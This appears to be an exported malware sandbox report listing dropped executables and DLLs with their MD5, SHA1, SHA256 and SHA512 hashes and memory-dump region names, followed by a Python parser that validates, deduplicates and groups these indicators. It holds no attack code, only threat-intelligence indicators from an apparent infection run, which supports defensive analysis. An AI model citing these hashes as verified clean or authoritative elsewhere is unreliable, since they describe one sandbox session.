| SHA512 | b2c24c363ce8bdda92c4def2afa57995cf0ed7b0feda1082a979f14edc73b87ce171adcf337dd85a9b5b5daaa90471a65a3f7506a02da3af92e2e7b56451baa3 |
memory/4556-238-0x00000000055A0000-0x00000000055A1000-memory.dmp
memory/1300-235-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\Xirs6iF07tjQgRKa5Latew69.exe
| MD5 | ff2d2b1250ae2706f6550893e12a25f8 |
| SHA1 | 5819d925377d38d921f6952add575a6ca19f213b |
| SHA256 | ca46080e121408d9624322e505dc2178ba99e15871c90e101b54e42ea7b54a96 |
| SHA512 | c66544678f3dd49aa1a23cd459a556d923ba44c5d88334a165ea7bd16e4561955536546627b7e83bf1e759428c04b6312e08fdc8c2f6fab69cd29f3b62ce3d23 |
C:\Users\Admin\Documents\DA0SNTjID05uVTiLF3fjEqmT.exe
| MD5 | a18f404bd61a4168a4693b1a76ffa81f |
| SHA1 | 021faa4316071e2db309658d2607779e911d1be7 |
| SHA256 | 403b1b1f0aca4695f9826afccbff72c3463f47fe9dd72daf74250dab62f52d0e |
| SHA512 | 47f58cd69e3cb7042b94ef0205fda6d8aa0f3e7d8358f09c7b1797f6c17c38dc839d01bb6ee7bedaeb4d1953da955433a6dbdcaffbc85f0c5a23509865ee2d4b |
memory/4556-234-0x0000000004AF0000-0x0000000004AF1000-memory.dmp
C:\Users\Admin\Documents\0L5QBYtSeFhpAWHjSvyEKKsB.exe
| MD5 | 99f9746aed8955dcabe487429ee1f1b2 |
| SHA1 | cf146a760cef73b60ec3b9595084b56dd576e98d |
| SHA256 | b3d3be5bddf3fb8c4c8eac161b4e1f584713e8b563de3f13a5a42781a0a7f26e |
| SHA512 | 0e0ccf3304eb9c827e78802c265eb93b70c74df1221fad816205b9ca15453d79f58ce3e36b5b4c191b1e92afd016b26829f8d961f63aa47a734da3d80db6688b |
C:\Users\Admin\AppData\Local\Temp\82d93c54-5db6-40b3-ab75-d48cebc8eb54\IIIIIIIIIIIIIIIIIIIII.dll
| MD5 | e8641f344213ca05d8b5264b5f4e2dee |
| SHA1 | 96729e31f9b805800b2248fd22a4b53e226c8309 |
| SHA256 | 85e82b9e9200e798e8f434459eacee03ed9818cc6c9a513fe083e72d48884e24 |
| SHA512 | 3130f32c100ecb97083ad8ac4c67863e9ceed3a9b06fc464d1aeeaec389f74c8bf56f4ce04f6450fd2cc0fa861d085101c433cfa4bec3095f8ebeeb53b739109 |
memory/3240-220-0x0000000000000000-mapping.dmp
memory/2948-229-0x00000000010B0000-0x00000000010C2000-memory.dmp
memory/672-228-0x00007FFA46680000-0x00007FFA467CF000-memory.dmp
memory/4500-212-0x00000000002E0000-0x00000000002E1000-memory.dmp
memory/672-219-0x000000001B4E0000-0x000000001B4E2000-memory.dmp
C:\Users\Admin\Documents\nmfd5A2zNFAjc1TaYF9LeeAp.exe
| MD5 | a84a527c4444287e412b4ab44bc63c9c |
| SHA1 | f1319320c69c6bfc4e7e6d82783b0bd6da19d053 |
| SHA256 | 5f482c3724bfbe5e7b934e2e48dcc2026ab35667d960a1c9ba3779165f594916 |
| SHA512 | a87ee15748adb35c49796a7a7e717aafecccfd1f3916f3f15cd350efc4945daee6930d53f5e072e05d169d302fa1c9bde5d4cb61289bfb56f09e9512efe2bbf4 |
C:\Users\Admin\Documents\BwJRfBfq36dSRDtBrEnJs67c.exe
| MD5 | ec5c1f5a598d85d60d987827a31746a1 |
| SHA1 | 56cd531452c3e3a5baecb0abe4b032997155aaec |
| SHA256 | ab59e845bc16961db7c3f2f8249083cff0098b263dc37b7d2819b223153d2ebe |
| SHA512 | 3705d1e5777a4d9b36b2f8f382277e301c5796e1f940c5e2387bc17b671e1511cd1bebc41e834265f491c13226338cb9415b45c33f347b4d4752e4ce20b72a13 |
memory/2948-207-0x0000000001090000-0x00000000010A0000-memory.dmp
memory/1584-206-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\yO7mDRoKTxQNVKo1cz01yuON.exe
| MD5 | a6ef5e293c9422d9a4838178aea19c50 |
| SHA1 | 93b6d38cc9376fa8710d2df61ae591e449e71b85 |
| SHA256 | 94ae283f87d31de4b9ae3344c469239be735621cd7546e95dfa70afa028507a0 |
| SHA512 | b5a999ca504efb49bcb209dcc1791dd77eded67f798590deb25a545009c2ad7577c8edc376b0f6c26140f82ecb5196b0a821be0cede6cdf65938ee174bfd4454 |
C:\Users\Admin\Documents\DA0SNTjID05uVTiLF3fjEqmT.exe
| MD5 | a18f404bd61a4168a4693b1a76ffa81f |
| SHA1 | 021faa4316071e2db309658d2607779e911d1be7 |
| SHA256 | 403b1b1f0aca4695f9826afccbff72c3463f47fe9dd72daf74250dab62f52d0e |
| SHA512 | 47f58cd69e3cb7042b94ef0205fda6d8aa0f3e7d8358f09c7b1797f6c17c38dc839d01bb6ee7bedaeb4d1953da955433a6dbdcaffbc85f0c5a23509865ee2d4b |
memory/1696-188-0x0000000000000000-mapping.dmp
memory/2948-186-0x0000000000000000-mapping.dmp
memory/4148-246-0x0000000002690000-0x00000000026AC000-memory.dmp
memory/4500-250-0x0000000004E80000-0x0000000004E81000-memory.dmp
memory/4556-249-0x0000000004A40000-0x0000000004FE6000-memory.dmp
memory/1916-252-0x0000000005550000-0x0000000005551000-memory.dmp
memory/4500-245-0x0000000004BF0000-0x0000000004BF1000-memory.dmp
memory/4252-254-0x0000000000000000-mapping.dmp
memory/4848-257-0x0000000000000000-mapping.dmp
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
| MD5 | aed57d50123897b0012c35ef5dec4184 |
| SHA1 | 568571b12ca44a585df589dc810bf53adf5e8050 |
| SHA256 | 096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e |
| SHA512 | ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c |
C:\Users\Admin\Documents\6ZxSebdQVdQkYVBi5haJVHHK.exe
| MD5 | 58f5dca577a49a38ea439b3dc7b5f8d6 |
| SHA1 | 175dc7a597935b1afeb8705bd3d7a556649b06cf |
| SHA256 | 857dd46102aea53f0cb7934b96410ebbc3e7988d38dcafdc8c0988f436533b98 |
| SHA512 | 3c75c0cbbbc14bd25b4feb141fd1595ce02469da50432fb48400eb089d6150fe87831ccc775d921eeec697af7aad33a35fadcfd2ec775aeee1ce34355af7338a |
memory/4848-266-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4764-262-0x0000000004CB0000-0x0000000004CB1000-memory.dmp
memory/4600-261-0x0000000000930000-0x0000000000931000-memory.dmp
memory/4132-260-0x0000000000000000-mapping.dmp
memory/4148-256-0x000000001B0D0000-0x000000001B0D2000-memory.dmp
memory/2500-253-0x00000000049C0000-0x00000000049EF000-memory.dmp
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
| MD5 | a3ec5ee946f7b93287ba9cf7facc6647 |
| SHA1 | 3595b700f8e41d45d8a8d15b42cd00cc19922647 |
| SHA256 | 5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0 |
| SHA512 | 63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6 |
memory/4600-277-0x0000000005AF0000-0x0000000005AF1000-memory.dmp
memory/4600-273-0x0000000006180000-0x0000000006181000-memory.dmp
memory/4264-275-0x0000000000000000-mapping.dmp
memory/1512-278-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\is-EOUKU.tmp\6ZxSebdQVdQkYVBi5haJVHHK.tmp
| MD5 | ffcf263a020aa7794015af0edee5df0b |
| SHA1 | bce1eb5f0efb2c83f416b1782ea07c776666fdab |
| SHA256 | 1d07cfb7104b85fc0dffd761f6848ad176117e146bbb4079fe993efa06b94c64 |
| SHA512 | 49f2b062adfb99c0c7f1012c56f0b52a8850d9f030cc32073b90025b372e4eb373f06a351e9b33264967427b8174c060c8a6110979f0eaf0872f7da6d5e4308a |
C:\Program Files (x86)\Company\NewProduct\customer3.exe
| MD5 | 9499dac59e041d057327078ccada8329 |
| SHA1 | 707088977b09835d2407f91f4f6dbe4a4c8f2fff |
| SHA256 | ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9 |
| SHA512 | 9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397 |
memory/4540-279-0x0000000000E60000-0x0000000000E61000-memory.dmp
memory/4132-281-0x00000000007B0000-0x00000000007B3000-memory.dmp
memory/4600-280-0x0000000005C70000-0x0000000005C71000-memory.dmp
memory/2156-276-0x0000000000000000-mapping.dmp
memory/1512-295-0x0000000000800000-0x0000000000801000-memory.dmp
memory/1512-293-0x00000000031C0000-0x00000000031FC000-memory.dmp
memory/4600-294-0x0000000005B60000-0x0000000005B61000-memory.dmp
memory/672-302-0x0000000001100000-0x000000000111B000-memory.dmp
memory/2872-307-0x0000000000000000-mapping.dmp
memory/3844-315-0x0000000000400000-0x0000000000448000-memory.dmp
memory/3844-309-0x0000000000000000-mapping.dmp
memory/1512-303-0x0000000005A50000-0x0000000005A51000-memory.dmp
memory/2856-306-0x0000000000000000-mapping.dmp
memory/4600-299-0x0000000005B50000-0x0000000005B51000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-RI3GK.tmp\itdownload.dll
| MD5 | d82a429efd885ca0f324dd92afb6b7b8 |
| SHA1 | 86bbdaa15e6fc5c7779ac69c84e53c43c9eb20ea |
| SHA256 | b258c4d7d2113dee2168ed7e35568c8e03341e24e3eafc7a22a0d62e32122ef3 |
| SHA512 | 5bf0c3b8fa5db63205a263c4fa5337188173248bef609ba4d03508c50db1fd1e336f3041ce96d78cc97659357a83e6e422f5b079d893a20a683270e05f5438df |
memory/2872-314-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2856-313-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1352-312-0x0000000000000000-mapping.dmp
memory/1512-310-0x0000000005A60000-0x0000000005A61000-memory.dmp
memory/4600-288-0x0000000005D80000-0x0000000005D81000-memory.dmp
memory/3264-290-0x0000000000750000-0x0000000000751000-memory.dmp
memory/2868-285-0x0000000000000000-mapping.dmp
memory/672-325-0x0000000002780000-0x0000000002781000-memory.dmp
memory/672-320-0x000000001C3F0000-0x000000001C3F1000-memory.dmp
memory/1696-324-0x0000000000580000-0x0000000000581000-memory.dmp
memory/1512-316-0x0000000005A70000-0x0000000005A71000-memory.dmp
memory/672-333-0x0000000002810000-0x0000000002811000-memory.dmp
memory/1512-323-0x0000000005A80000-0x0000000005A81000-memory.dmp
memory/1512-329-0x0000000005A90000-0x0000000005A91000-memory.dmp
memory/4540-335-0x0000000003DF0000-0x0000000003DF1000-memory.dmp
memory/4552-347-0x0000000004070000-0x0000000004079000-memory.dmp
memory/1928-351-0x0000000000000000-mapping.dmp
memory/1656-341-0x0000000002470000-0x000000000247A000-memory.dmp
memory/2332-364-0x00000000026D0000-0x00000000026E9000-memory.dmp
memory/4544-369-0x00000000040C0000-0x00000000040EF000-memory.dmp
memory/1224-368-0x0000000000000000-mapping.dmp
memory/3004-358-0x0000000003F90000-0x0000000003FC0000-memory.dmp
memory/1364-354-0x00000000040F0000-0x000000000418D000-memory.dmp
memory/1696-376-0x00000000054B0000-0x00000000054B1000-memory.dmp
memory/3264-381-0x0000000003300000-0x0000000003301000-memory.dmp
memory/2872-385-0x0000000005420000-0x00000000059C6000-memory.dmp
memory/4592-392-0x0000000004080000-0x00000000040B0000-memory.dmp
memory/3844-396-0x00000000055A0000-0x0000000005BB8000-memory.dmp
memory/4264-398-0x0000014574930000-0x000001457499F000-memory.dmp
memory/5388-397-0x0000000000000000-mapping.dmp
memory/1928-395-0x0000000000400000-0x0000000000409000-memory.dmp
memory/5328-394-0x0000000000000000-mapping.dmp
memory/1584-389-0x00000000042A0000-0x00000000043A5000-memory.dmp
memory/5228-388-0x0000000000000000-mapping.dmp
memory/4264-404-0x00000145749A0000-0x0000014574A6F000-memory.dmp
memory/5488-403-0x0000000000000000-mapping.dmp
memory/2172-380-0x0000000000000000-mapping.dmp
memory/5732-416-0x0000000000000000-mapping.dmp
memory/1512-415-0x0000000005AB0000-0x0000000005AB1000-memory.dmp
memory/3096-411-0x0000000004BD0000-0x0000000004BE6000-memory.dmp
memory/5704-414-0x0000000000000000-mapping.dmp
memory/1512-409-0x0000000005AA0000-0x0000000005AA1000-memory.dmp
memory/1512-417-0x0000000005AC0000-0x0000000005AC1000-memory.dmp
memory/5672-423-0x0000000000000000-mapping.dmp
memory/5228-429-0x00000000026E0000-0x00000000026E2000-memory.dmp
memory/1512-425-0x0000000005AE0000-0x0000000005AE1000-memory.dmp
memory/672-434-0x000000001B4E2000-0x000000001B4E4000-memory.dmp
memory/1512-431-0x0000000005AF0000-0x0000000005AF1000-memory.dmp
memory/1512-420-0x0000000005AD0000-0x0000000005AD1000-memory.dmp
memory/1512-436-0x0000000005B00000-0x0000000005B01000-memory.dmp
memory/2556-435-0x0000000004990000-0x00000000052B6000-memory.dmp
memory/1512-437-0x0000000005B10000-0x0000000005B11000-memory.dmp
memory/1512-438-0x0000000005B20000-0x0000000005B21000-memory.dmp
memory/1512-441-0x0000000005B40000-0x0000000005B41000-memory.dmp
memory/1512-443-0x0000000005B50000-0x0000000005B51000-memory.dmp
memory/1512-444-0x0000000005B60000-0x0000000005B61000-memory.dmp
memory/2856-446-0x00000000056A0000-0x0000000005CB8000-memory.dmp
memory/1512-440-0x0000000005B30000-0x0000000005B31000-memory.dmp
memory/4128-448-0x0000000000000000-mapping.dmp
memory/2392-454-0x0000000000000000-mapping.dmp
memory/5704-458-0x0000000005010000-0x0000000005011000-memory.dmp
memory/5376-461-0x0000000000000000-mapping.dmp
memory/5464-462-0x0000000000000000-mapping.dmp
memory/5488-467-0x0000000004A80000-0x0000000004A81000-memory.dmp
memory/5376-476-0x0000000005080000-0x0000000005081000-memory.dmp
memory/5880-478-0x0000000000000000-mapping.dmp
memory/672-480-0x000000001B4E4000-0x000000001B4E5000-memory.dmp
memory/5940-481-0x0000000000000000-mapping.dmp
memory/6052-483-0x0000000000000000-mapping.dmp
memory/4556-482-0x0000000000000000-mapping.dmp
memory/4884-487-0x0000000000000000-mapping.dmp
memory/4000-485-0x0000000000000000-mapping.dmp
memory/5940-486-0x0000000002D50000-0x0000000002D51000-memory.dmp
memory/4924-489-0x0000000000000000-mapping.dmp
memory/3308-490-0x0000000000000000-mapping.dmp
memory/1720-492-0x0000000000000000-mapping.dmp
memory/2284-498-0x0000000000000000-mapping.dmp
memory/3308-503-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5372-502-0x0000000000000000-mapping.dmp
memory/2284-507-0x0000000000700000-0x0000000000701000-memory.dmp
memory/5264-505-0x0000000000400000-0x000000000046D000-memory.dmp
memory/5256-501-0x0000000000000000-mapping.dmp
memory/5264-497-0x0000000000000000-mapping.dmp
memory/4924-499-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4000-496-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5372-513-0x0000000000700000-0x0000000000701000-memory.dmp
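The listing above is a flat export: a dropped-file path followed by `| ALGO | hex |` rows, interleaved with memory-dump names, and the raw export repeats some entries verbatim. To turn it into usable IOCs you want to validate the digests (a truncated hash is a common copy-paste defect), collapse repeats, and group the dumps by process. The following parser is an added example and not part of the sandbox report. It assumes the dump names follow the `memory/<pid>-<event>-<start>[-<end>]-<kind>.dmp` layout visible in the listing; that the first field is a PID is an assumption, not something the report states. The sample input is an excerpt of the listing above plus one constructed entry with a deliberately truncated SHA1.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Expected hex-digit length per algorithm; a row of the wrong length is rejected.
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")
# Assumed layout of the dump names: memory/<pid>-<event>-<start>[-<end>]-<kind>.dmp
MEM_LINE = re.compile(
    r"^memory/(\d+)-(\d+)-0x([0-9a-fA-F]+)(?:-0x([0-9a-fA-F]+))?-(memory|mapping)\.dmp$"
)


@dataclass
class DroppedFile:
    path: str
    hashes: Dict[str, str] = field(default_factory=dict)


@dataclass
class MemoryDump:
    pid: int
    event: int
    start: int
    end: Optional[int]
    kind: str  # "memory" (a region dump) or "mapping" (no end address given)

    @property
    def size(self) -> Optional[int]:
        return None if self.end is None else self.end - self.start


def parse_listing(text: str):
    """Return (files, dumps, errors) for one listing in the report's format."""
    files: List[DroppedFile] = []
    dumps: List[MemoryDump] = []
    errors: List[str] = []
    current: Optional[DroppedFile] = None
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        m = HASH_ROW.match(line)
        if m:
            algo, digest = m.group(1), m.group(2).lower()
            if current is None:
                errors.append(f"line {lineno}: {algo} row with no preceding path")
            elif len(digest) != HASH_LEN[algo]:
                errors.append(f"line {lineno}: {algo} has {len(digest)} hex digits, "
                              f"expected {HASH_LEN[algo]}")
            else:
                current.hashes[algo] = digest
            continue
        m = MEM_LINE.match(line)
        if m:
            current = None  # a dump line closes the open file block
            dumps.append(MemoryDump(
                pid=int(m.group(1)), event=int(m.group(2)),
                start=int(m.group(3), 16),
                end=int(m.group(4), 16) if m.group(4) else None,
                kind=m.group(5)))
            continue
        # Anything else is a file path that opens a new block.
        current = DroppedFile(path=line)
        files.append(current)
    return files, dumps, errors


def dedupe_files(files: List[DroppedFile]) -> List[DroppedFile]:
    """Collapse repeated (path, SHA256) entries, keeping first-seen order."""
    seen, unique = set(), []
    for f in files:
        key = (f.path.lower(), f.hashes.get("SHA256"))
        if key not in seen:
            seen.add(key)
            unique.append(f)
    return unique


def dumps_by_pid(dumps: List[MemoryDump]) -> Dict[int, List[MemoryDump]]:
    """Group dump records by PID so one process's regions can be read together."""
    grouped: Dict[int, List[MemoryDump]] = {}
    for d in dumps:
        grouped.setdefault(d.pid, []).append(d)
    return grouped


# Excerpt of the listing above (including one entry the raw export repeats),
# plus a constructed final entry with a truncated SHA1 that is NOT in the report.
SAMPLE = r"""
C:\Users\Admin\Documents\nmfd5A2zNFAjc1TaYF9LeeAp.exe
| MD5 | a84a527c4444287e412b4ab44bc63c9c |
| SHA1 | f1319320c69c6bfc4e7e6d82783b0bd6da19d053 |
| SHA256 | 5f482c3724bfbe5e7b934e2e48dcc2026ab35667d960a1c9ba3779165f594916 |
C:\Users\Admin\Documents\nmfd5A2zNFAjc1TaYF9LeeAp.exe
| MD5 | a84a527c4444287e412b4ab44bc63c9c |
| SHA1 | f1319320c69c6bfc4e7e6d82783b0bd6da19d053 |
| SHA256 | 5f482c3724bfbe5e7b934e2e48dcc2026ab35667d960a1c9ba3779165f594916 |
memory/2948-207-0x0000000001090000-0x00000000010A0000-memory.dmp
memory/1584-206-0x0000000000000000-mapping.dmp
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
| MD5 | aed57d50123897b0012c35ef5dec4184 |
| SHA256 | 096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e |
memory/2948-186-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\constructed_bad_entry.exe
| SHA1 | 7a3cf5acb7434ae4 |
"""

if __name__ == "__main__":
    files, dumps, errors = parse_listing(SAMPLE)
    for f in dedupe_files(files):
        print(f.path, f.hashes.get("SHA256"))
    for pid, regions in sorted(dumps_by_pid(dumps).items()):
        print(pid, [(hex(r.start), r.kind, r.size) for r in regions])
    for e in errors:
        print("WARN", e)
```

Deduplication keys on path plus SHA256 rather than path alone, so a file rewritten with different content at the same path stays a separate IOC; rows that fail the length check are reported and dropped rather than silently shortened into an indicator that will never match.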